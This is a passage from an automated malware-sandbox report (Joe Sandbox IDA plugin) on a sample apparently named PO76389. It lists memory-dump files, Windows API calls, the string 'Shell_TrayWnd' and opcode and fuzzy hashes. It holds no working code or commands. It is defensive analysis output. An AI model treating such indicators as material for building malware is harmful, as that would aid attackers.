                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 28de0a37c521e3aff6985ea5303f51353dce190a87b56e5cbcab5f03677432e2
                                                    • Instruction ID: 13a314063739cfa08ca9dd9a7a77b57296db9b7eca4696f3a4a475b279d6250f
                                                    • Opcode Fuzzy Hash: 28de0a37c521e3aff6985ea5303f51353dce190a87b56e5cbcab5f03677432e2
                                                    • Instruction Fuzzy Hash: 36D0C976384314B7E764A770EC4BFD66A64AB24B11F0409297759AA2D0C9E4A8148664